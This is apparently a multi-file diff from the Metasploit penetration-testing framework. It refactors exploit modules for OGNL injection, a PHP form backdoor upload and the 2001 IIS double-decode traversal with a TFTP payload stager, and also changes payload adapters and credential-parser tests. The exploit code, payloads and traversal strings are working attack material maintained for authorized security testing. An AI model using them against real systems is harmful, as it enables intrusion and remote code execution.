def execute_command(cmd, _opts = {})
|
||||
header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
|
||||
res = inject_ognl(cmd, header: header)
|
||||
|
||||
unless res && res.headers.include?(header)
|
||||
fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
|
||||
end
|
||||
|
||||
vprint_good("Successfully executed command: #{cmd}")
|
||||
res.headers[header]
|
||||
end
|
||||
|
||||
def inject_ognl(cmd, header:)
|
||||
send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),
|
||||
'headers' => { header => cmd }
|
||||
)
|
||||
end
|
||||
|
||||
def ognl_payload(_cmd, header:)
|
||||
<<~OGNL.gsub(/^\s+/, '').tr("\n", '')
|
||||
ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
|
||||
${
|
||||
Class.forName("com.opensymphony.webwork.ServletActionContext")
|
||||
.getMethod("getResponse",null)
|
||||
@@ -154,5 +183,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
)
|
||||
}
|
||||
OGNL
|
||||
res = inject_ognl(ognl, 'headers' => { header => cmd })
|
||||
|
||||
unless res && res.headers.include?(header)
|
||||
fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
|
||||
end
|
||||
|
||||
vprint_good("Successfully executed command: #{cmd}")
|
||||
res.headers[header]
|
||||
end
|
||||
|
||||
def inject_ognl(ognl, opts = {})
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')
|
||||
}.merge(opts))
|
||||
end
|
||||
end
|
||||
|
||||
@@ -60,7 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
])
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
|
||||
OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300]),
|
||||
OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^([^\t\n\f \/>"'=]+)$/),
|
||||
OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'], regex: /^([^\t\n\f \/>"'=]+)$/),
|
||||
OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'], regex: /^([^\t\n\f \/>"'=]+)$/)
|
||||
])
|
||||
end
|
||||
|
||||
@@ -98,6 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
name_field = datastore['NameField']
|
||||
email_field = datastore['EmailField']
|
||||
message_field = datastore['MessageField']
|
||||
payload_file_name = "#{rand_text_alphanumeric(8)}.php"
|
||||
payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
|
||||
|
||||
@@ -111,9 +117,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('submit', nil, nil, 'form-data; name="action"')
|
||||
data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
|
||||
data.add_part(email, nil, nil, 'form-data; name="email"')
|
||||
data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
|
||||
data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
|
||||
data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
|
||||
data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
|
||||
|
||||
print_status("Writing the backdoor to #{payload_file_path}")
|
||||
res = send_request_cgi(
|
||||
|
||||
@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'DisclosureDate' => '2021-05-17',
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'Reliability' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
|
||||
'SideEffects' => [REPEATABLE_SESSION]
|
||||
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
|
||||
'Reliability' => [REPEATABLE_SESSION]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
},
|
||||
'DefaultTarget' => 2,
|
||||
'Notes' => {
|
||||
'NOCVE' => '0day',
|
||||
'NOCVE' => ['0day'],
|
||||
'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service
|
||||
'Reliability' => [REPEATABLE_SESSION],
|
||||
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
|
||||
|
||||
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-4936' ],
|
||||
[' OSVDB', '116050'],
|
||||
[ 'OSVDB', '116050' ],
|
||||
[ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
|
||||
@@ -2,15 +2,13 @@
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
require 'rex/exploitation'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
# NOTE: This cannot be an HttpClient module since the response from the server
|
||||
# is not a valid HttpResponse
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
@@ -21,7 +19,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
This module will execute an arbitrary payload on a Microsoft IIS installation
|
||||
that is vulnerable to the CGI double-decode vulnerability of 2001.
|
||||
|
||||
NOTE: This module will leave a metasploit payload in the IIS scripts directory.
|
||||
This module has been tested successfully on:
|
||||
|
||||
Windows 2000 Professional (SP0) (EN);
|
||||
Windows 2000 Professional (SP1) (AR);
|
||||
Windows 2000 Professional (SP1) (CZ);
|
||||
Windows 2000 Server (SP0) (FR);
|
||||
Windows 2000 Server (SP1) (EN); and
|
||||
Windows 2000 Server (SP1) (SE).
|
||||
|
||||
Note: This module will leave a Metasploit payload exe in the IIS scripts directory.
|
||||
},
|
||||
'Author' => [ 'jduck' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@@ -34,27 +41,41 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ]
|
||||
[
|
||||
'Windows (Dropper)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86],
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' },
|
||||
'Type' => :win_dropper
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows (Command)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_CMD,
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' },
|
||||
'Type' => :win_command
|
||||
}
|
||||
]
|
||||
],
|
||||
'CmdStagerFlavor' => 'tftp',
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_SAFE ],
|
||||
'Reliability' => [ REPEATABLE_SESSION ],
|
||||
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
|
||||
},
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => '2001-05-15',
|
||||
'Compat' => {
|
||||
'Meterpreter' => {
|
||||
'Commands' => %w[
|
||||
stdapi_fs_delete_file
|
||||
stdapi_sys_process_execute
|
||||
]
|
||||
}
|
||||
}
|
||||
'DisclosureDate' => '2001-05-15'
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]),
|
||||
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
|
||||
OptString.new('WINDIR', [ false, 'The Windows directory name of the target host', nil ]),
|
||||
OptInt.new('DEPTH', [ true, 'Traversal depth to reach the drive root', 2 ])
|
||||
]
|
||||
)
|
||||
|
||||
@@ -62,181 +83,126 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def dotdotslash
|
||||
possibilities = [
|
||||
"..%255c",
|
||||
"..%%35c",
|
||||
"..%%35%63",
|
||||
"..%25%35%63",
|
||||
".%252e/",
|
||||
"%252e./",
|
||||
"%%32%65./",
|
||||
".%%32%65/",
|
||||
".%25%32%65/",
|
||||
"%25%32%65./"
|
||||
]
|
||||
possibilities[rand(possibilities.length)]
|
||||
[
|
||||
'..%255c',
|
||||
'..%%35c',
|
||||
'..%%35%63',
|
||||
'..%25%35%63',
|
||||
'.%252e/',
|
||||
'%252e./',
|
||||
'%%32%65./',
|
||||
'.%%32%65/',
|
||||
'.%25%32%65/',
|
||||
'%25%32%65./'
|
||||
].sample
|
||||
end
|
||||
|
||||
def mini_http_request(opts, timeout = 5)
|
||||
connect
|
||||
req = ''
|
||||
req << opts['method']
|
||||
req << ' '
|
||||
req << opts['uri']
|
||||
req << ' '
|
||||
req << "HTTP/1.0\r\n"
|
||||
req << "Host: #{datastore['RHOST']}\r\n"
|
||||
req << "\r\n"
|
||||
sock.put(req)
|
||||
# Detect the correct Windows directory name.
|
||||
# Unfortunately, the IIS scripts directory must
|
||||
# be located on the same drive as %SystemRoot%.
|
||||
def detect_windows_directory
|
||||
win_dirs = %w[winnt windows]
|
||||
matches = [
|
||||
'Directory of',
|
||||
'\\inetpub\\',
|
||||
"\\scripts\r\n"
|
||||
]
|
||||
|
||||
# This isn't exactly awesome, but it seems to work..
|
||||
begin
|
||||
headers = sock.get_once(-1, timeout) || ''
|
||||
body = sock.get_once(-1, timeout) || ''
|
||||
rescue ::EOFError
|
||||
# nothing
|
||||
win_dirs.each do |dir|
|
||||
res = execute_command('dir', windir: dir)
|
||||
next unless res
|
||||
next unless res.code == 200
|
||||
next unless res.body
|
||||
|
||||
matches.each do |m|
|
||||
return dir if res.body.to_s.include?(m)
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
[headers, body]
|
||||
end
|
||||
|
||||
def detect_windows_dir()
|
||||
win_dirs = [ 'winnt', 'windows' ]
|
||||
win_dirs.each { |dir|
|
||||
res = execute_command("dir", { :windir => dir })
|
||||
if (res.kind_of?(Array))
|
||||
body = res[1]
|
||||
if (body and body =~ /Directory of /)
|
||||
return dir
|
||||
end
|
||||
end
|
||||
}
|
||||
return nil
|
||||
nil
|
||||
end
|
||||
|
||||
def check
|
||||
@win_dir = detect_windows_dir()
|
||||
if @win_dir
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
win_dir = detect_windows_directory
|
||||
win_dir ? CheckCode::Vulnerable("Found Windows directory name: #{win_dir}") : CheckCode::Safe
|
||||
end
|
||||
|
||||
#
|
||||
# NOTE: the command executes regardless of whether or not
|
||||
# a valid response is returned...
|
||||
#
|
||||
def execute_command(cmd, opts = {})
|
||||
# Don't try the start command...
|
||||
# Using the "start" method doesn't seem to make iis very happy :(
|
||||
return [nil, nil] if cmd =~ /^start [a-zA-Z]+\.exe$/
|
||||
# Don't run the start command...
|
||||
# We'll execute the payload via IIS later.
|
||||
# Using the "start" method doesn't seem to make IIS very happy :(
|
||||
return if cmd.start_with?('start') && cmd.include?('.exe')
|
||||
|
||||
print_status("Executing command: #{cmd} (options: #{opts.inspect})")
|
||||
|
||||
uri = '/scripts/'
|
||||
exe = opts[:cgifname]
|
||||
if (not exe)
|
||||
uri << dotdotslash
|
||||
uri << dotdotslash
|
||||
uri << (opts[:windir] || @win_dir)
|
||||
uri << '/system32/cmd.exe'
|
||||
vprint_status("Executing command: #{cmd}")
|
||||
if opts[:cgifname]
|
||||
cmd_path = opts[:cgifname]
|
||||
else
|
||||
uri << exe
|
||||
cmd_path = ''
|
||||
datastore['DEPTH'].times { cmd_path << dotdotslash }
|
||||
cmd_path << (opts[:windir] || @win_dir)
|
||||
cmd_path << '/system32/cmd.exe'
|
||||
end
|
||||
uri << '?/x+/c+'
|
||||
uri << Rex::Text.uri_encode(cmd)
|
||||
uri = "/scripts/#{cmd_path}?/x+/c+#{Rex::Text.uri_encode(cmd)}"
|
||||
send_request_cgi({ 'uri' => uri }, 20)
|
||||
end
|
||||
|
||||
vprint_status("Attempting to execute: #{uri}")
|
||||
|
||||
mini_http_request({
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
}, 20)
|
||||
def copy_cmd_exe_to_scripts_directory
|
||||
fname = "#{rand_text_alphanumeric(4..7)}.exe"
|
||||
print_status("Copying \"\\#{@win_dir}\\system32\\cmd.exe\" to the IIS scripts directory as \"#{fname}\"...")
|
||||
res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{fname}")
|
||||
fail_with(Failure::Unknown, 'No reply from server') unless res
|
||||
fname
|
||||
end
|
||||
|
||||
def exploit
|
||||
@win_dir = datastore['WINDIR']
|
||||
if not @win_dir
|
||||
# try to detect the windows directory
|
||||
@win_dir = detect_windows_dir()
|
||||
if not @win_dir
|
||||
fail_with(Failure::NoTarget, "Unable to detect the target host windows directory (maybe not vulnerable)!")
|
||||
end
|
||||
end
|
||||
print_status("Using windows directory \"#{@win_dir}\"")
|
||||
@win_dir = datastore['WINDIR'] || detect_windows_directory
|
||||
|
||||
# now copy the file
|
||||
exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"
|
||||
print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
|
||||
# NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
|
||||
# Unfortunately, using %SystemRoot% doesn't seem to work :(
|
||||
res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}")
|
||||
fail_with(Failure::NotVulnerable, 'Unable to detect the target host Windows directory (maybe not vulnerable)!') unless @win_dir
|
||||
|
||||
if (datastore['CMD'])
|
||||
res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
|
||||
if (res[0])
|
||||
print_status("Command output:\n" + res[0])
|
||||
print_status("Using Windows directory \"#{@win_dir}\"")
|
||||
|
||||
@cmd_exe_fname = copy_cmd_exe_to_scripts_directory
|
||||
|
||||
case target['Type']
|
||||
when :win_command
|
||||
res = execute_command(payload.encoded, cgifname: @cmd_exe_fname)
|
||||
|
||||
if res && res.body
|
||||
cmd_res = res.code == 200 ? res.body : res.body.to_s.scan(%r{<pre>(.*?)</pre>}m).flatten.first.to_s
|
||||
if cmd_res.strip.blank?
|
||||
print_status('Command returned no output')
|
||||
else
|
||||
print_good('Command output:')
|
||||
print_line(cmd_res)
|
||||
end
|
||||
else
|
||||
print_error("No output received")
|
||||
print_error('No reply')
|
||||
end
|
||||
when :win_dropper
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager(
|
||||
temp: '.',
|
||||
linemax: 1_400,
|
||||
cgifname: @cmd_exe_fname,
|
||||
tftphost: tftphost,
|
||||
# Force noconcat so we can skip the "start" command in execute_command method
|
||||
noconcat: true,
|
||||
# We can't delete the payload while it is running, so don't try
|
||||
nodelete: true
|
||||
)
|
||||
|
||||
res = execute_command("del #{exe_fname}")
|
||||
return
|
||||
exe_payload = stager_instance.payload_exe
|
||||
register_file_for_cleanup(exe_payload)
|
||||
|
||||
print_status("Triggering payload \"#{exe_payload}\" via a direct request...")
|
||||
send_request_cgi({ 'uri' => "/scripts/#{exe_payload}" }, 1)
|
||||
end
|
||||
|
||||
# Use the CMD stager to get a payload running
|
||||
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
|
||||
|
||||
# Save these file names for later deletion
|
||||
@exe_cmd_copy = exe_fname
|
||||
@exe_payload = stager_instance.payload_exe
|
||||
|
||||
# Just for good measure, we'll make a quick, direct request for the payload
|
||||
# Using the "start" method doesn't seem to make iis very happy :(
|
||||
print_status("Triggering the payload via a direct request...")
|
||||
mini_http_request({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1)
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
#
|
||||
# The following handles deleting the copied cmd.exe and payload exe!
|
||||
#
|
||||
def on_new_session(client)
|
||||
if client.type != "meterpreter"
|
||||
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
|
||||
print_error("The copied exe and the payload exe must be removed manually.")
|
||||
return
|
||||
end
|
||||
|
||||
return if not @exe_cmd_copy
|
||||
|
||||
# stdapi must be loaded before we can use fs.file
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
|
||||
# Delete the copied CMD.exe
|
||||
print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...")
|
||||
client.fs.file.rm(@exe_cmd_copy)
|
||||
|
||||
# Migrate so that we can delete the payload exe
|
||||
client.console.run_single("run migrate -f")
|
||||
|
||||
# Delete the payload exe
|
||||
return if not @exe_payload
|
||||
|
||||
delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload
|
||||
|
||||
print_status("Changing permissions on #{delete_me_too} ...")
|
||||
cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too
|
||||
client.sys.process.execute(cmd, nil, { 'Hidden' => true })
|
||||
|
||||
print_warning("Deleting #{delete_me_too} ...")
|
||||
begin
|
||||
client.fs.file.rm(delete_me_too)
|
||||
rescue ::Exception => e
|
||||
print_error("Exception: #{e.inspect}")
|
||||
end
|
||||
# Remove the copied cmd.exe from the IIS scripts directory
|
||||
def cleanup
|
||||
execute_command("del #{@cmd_exe_fname}") if @cmd_exe_fname
|
||||
ensure
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
@@ -34,15 +34,26 @@ module MetasploitModule
|
||||
super
|
||||
end
|
||||
|
||||
def generate
|
||||
def generate(opts = {})
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
payload = super
|
||||
|
||||
cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
|
||||
end
|
||||
|
||||
def generate_stage(opts = {})
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
super
|
||||
end
|
||||
|
||||
def generate_payload_uuid(conf = {})
|
||||
conf[:arch] ||= module_info['AdaptedArch']
|
||||
conf[:platform] ||= module_info['AdaptedPlatform']
|
||||
super
|
||||
end
|
||||
|
||||
def handle_connection(conn, opts = {})
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
@@ -34,15 +34,26 @@ module MetasploitModule
|
||||
super
|
||||
end
|
||||
|
||||
def generate
|
||||
def generate(opts = {})
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
payload = super
|
||||
|
||||
cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
|
||||
end
|
||||
|
||||
def generate_stage(opts = {})
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
super
|
||||
end
|
||||
|
||||
def generate_payload_uuid(conf = {})
|
||||
conf[:arch] ||= module_info['AdaptedArch']
|
||||
conf[:platform] ||= module_info['AdaptedPlatform']
|
||||
super
|
||||
end
|
||||
|
||||
def handle_connection(conn, opts = {})
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
@@ -4,7 +4,7 @@
|
||||
##
|
||||
|
||||
module MetasploitModule
|
||||
CachedSize = 863
|
||||
CachedSize = 867
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
@@ -28,12 +28,22 @@ class MetasploitModule < Msf::Post
|
||||
priv_elevate_getsystem
|
||||
]
|
||||
}
|
||||
},
|
||||
'Notes' => {
|
||||
'AKA' => [
|
||||
'Named Pipe Impersonation',
|
||||
'Token Duplication',
|
||||
'RPCSS',
|
||||
'PrintSpooler',
|
||||
'EFSRPC',
|
||||
'EfsPotato'
|
||||
]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-5), otherwise try them all", 0])
|
||||
OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
@@ -256,6 +256,10 @@ RSpec.describe "Metasploit's json-rpc" do
|
||||
end
|
||||
|
||||
context 'when the module does not support a check method' do
|
||||
before do
|
||||
mock_rack_env('development')
|
||||
end
|
||||
|
||||
let(:module_name) { 'scanner/http/title' }
|
||||
|
||||
it 'returns successful job results' do
|
||||
|
||||
@@ -1,31 +1,36 @@
|
||||
# -*- coding: binary -*-
|
||||
require 'spec_helper'
|
||||
|
||||
require 'spec_helper'
|
||||
|
||||
RSpec.describe Msf::Auxiliary::Juniper do
|
||||
class DummyJuniperClass
|
||||
include Msf::Auxiliary::Juniper
|
||||
def framework
|
||||
Msf::Simple::Framework.create(
|
||||
'ConfigDirectory' => Rails.root.join('spec', 'dummy', 'framework', 'config').to_s,
|
||||
# don't load any module paths so we can just load the module under test and save time
|
||||
'DeferModuleLoads' => true
|
||||
'ConfigDirectory' => Rails.root.join('spec', 'dummy', 'framework', 'config').to_s,
|
||||
# don't load any module paths so we can just load the module under test and save time
|
||||
'DeferModuleLoads' => true
|
||||
)
|
||||
end
|
||||
|
||||
def active_db?
|
||||
true
|
||||
end
|
||||
def print_good(str=nil)
|
||||
raise StandardError.new("This method needs to be stubbed.")
|
||||
|
||||
def print_good(_str = nil)
|
||||
raise StandardError, 'This method needs to be stubbed.'
|
||||
end
|
||||
def store_cred(hsh=nil)
|
||||
raise StandardError.new("This method needs to be stubbed.")
|
||||
|
||||
def store_cred(_hsh = nil)
|
||||
raise StandardError, 'This method needs to be stubbed.'
|
||||
end
|
||||
|
||||
def fullname
|
||||
"auxiliary/scanner/snmp/juniper_dummy"
|
||||
'auxiliary/scanner/snmp/juniper_dummy'
|
||||
end
|
||||
|
||||
def myworkspace
|
||||
raise StandardError.new("This method needs to be stubbed.")
|
||||
raise StandardError, 'This method needs to be stubbed.'
|
||||
end
|
||||
end
|
||||
|
||||
@@ -34,12 +39,11 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
let!(:workspace) { FactoryBot.create(:mdm_workspace) }
|
||||
|
||||
context '#create_credential_and_login' do
|
||||
|
||||
let(:session) { FactoryBot.create(:mdm_session) }
|
||||
|
||||
let(:task) { FactoryBot.create(:mdm_task, workspace: workspace)}
|
||||
let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
|
||||
|
||||
let(:user) { FactoryBot.create(:mdm_user)}
|
||||
let(:user) { FactoryBot.create(:mdm_user) }
|
||||
|
||||
subject(:test_object) { DummyJuniperClass.new }
|
||||
|
||||
@@ -47,7 +51,7 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
let(:service) { FactoryBot.create(:mdm_service, host: FactoryBot.create(:mdm_host, workspace: workspace)) }
|
||||
let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
|
||||
|
||||
let(:login_data) {
|
||||
let(:login_data) do
|
||||
{
|
||||
address: service.host.address,
|
||||
port: service.port,
|
||||
@@ -63,12 +67,12 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
}
|
||||
end
|
||||
|
||||
it 'creates a Metasploit::Credential::Login' do
|
||||
expect{test_object.create_credential_and_login(login_data)}.to change{Metasploit::Credential::Login.count}.by(1)
|
||||
expect { test_object.create_credential_and_login(login_data) }.to change { Metasploit::Credential::Login.count }.by(1)
|
||||
end
|
||||
it "associates the Metasploit::Credential::Core with a task if passed" do
|
||||
it 'associates the Metasploit::Credential::Core with a task if passed' do
|
||||
login = test_object.create_credential_and_login(login_data.merge(task_id: task.id))
|
||||
expect(login.tasks).to include(task)
|
||||
end
|
||||
@@ -81,164 +85,159 @@ RSpec.describe Msf::Auxiliary::Juniper do
|
||||
|
||||
it 'deals with admin credentials' do
|
||||
expect(aux_juniper).to receive(:print_good).with('Admin user netscreen found with password hash nKVUM2rwMUzPcrkG5sWIHdCtqkAibn')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "netscreen",
|
||||
private_data: "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'netscreen',
|
||||
private_data: 'nKVUM2rwMUzPcrkG5sWIHdCtqkAibn',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1',161,
|
||||
"set admin name \"netscreen\"\n" <<
|
||||
"set admin password \"nKVUM2rwMUzPcrkG5sWIHdCtqkAibn\"\n")
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1', 161,
|
||||
"set admin name \"netscreen\"\n" <<
|
||||
"set admin password \"nKVUM2rwMUzPcrkG5sWIHdCtqkAibn\"\n")
|
||||
end
|
||||
|
||||
it 'deals with user account with password hash' do
|
||||
expect(aux_juniper).to receive(:print_good).with('User 1 named testuser found with password hash 02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=. Enable permission: enable')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
|
||||
expect(aux_juniper).to receive(:store_loot).with("juniper.netscreen.config", "text/plain", "127.0.0.1",
|
||||
"set user \"testuser\" uid 1\n" <<
|
||||
"set user \"testuser\" type auth\n" <<
|
||||
"set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
|
||||
"set user \"testuser\" enable",
|
||||
"config.txt", "Juniper Netscreen Configuration"
|
||||
)
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
|
||||
expect(aux_juniper).to receive(:store_loot).with('juniper.netscreen.config', 'text/plain', '127.0.0.1',
|
||||
"set user \"testuser\" uid 1\n" <<
|
||||
"set user \"testuser\" type auth\n" <<
|
||||
"set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
|
||||
'set user "testuser" enable',
|
||||
'config.txt', 'Juniper Netscreen Configuration')
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 1337,
|
||||
protocol: "tcp",
|
||||
protocol: 'tcp',
|
||||
workspace_id: workspace.id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
|
||||
username: "testuser",
|
||||
jtr_format: "sha1",
|
||||
private_data: "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=",
|
||||
module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
|
||||
username: 'testuser',
|
||||
jtr_format: 'sha1',
|
||||
private_data: '02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=',
|
||||
private_type: :nonreplayable_hash,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
)
|
||||
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,
|
||||
"set user \"testuser\" uid 1\n" <<
|
||||
"set user \"testuser\" type auth\n" <<
|
||||
"set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
|
||||
"set user \"testuser\" enable\n")
|
||||
aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337,
|
||||
"set user \"testuser\" uid 1\n" <<
|
||||
"set user \"testuser\" type auth\n" <<
|
||||
"set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
|
||||
"set user \"testuser\" enable\n")
|
||||
end
|
||||
|
||||
context 'deals with snmp-server community' do
|
||||
|
||||
it 'with Read permission' do
|
||||
expect(aux_juniper).to receive(:print_good).with('SNMP community sales with permissions Read-Only')
|
||||
expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
|
||||
expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
|
||||
expect(aux_juniper).to receive(:create_credential_and_login).with(
|
||||
{
|
||||
address: "127.0.0.1",
|
||||
address: '127.0.0.1',
|
||||
port: 161,
|
||||
protocol: "udp",
|
||||
protocol: 'udp',
|
||||
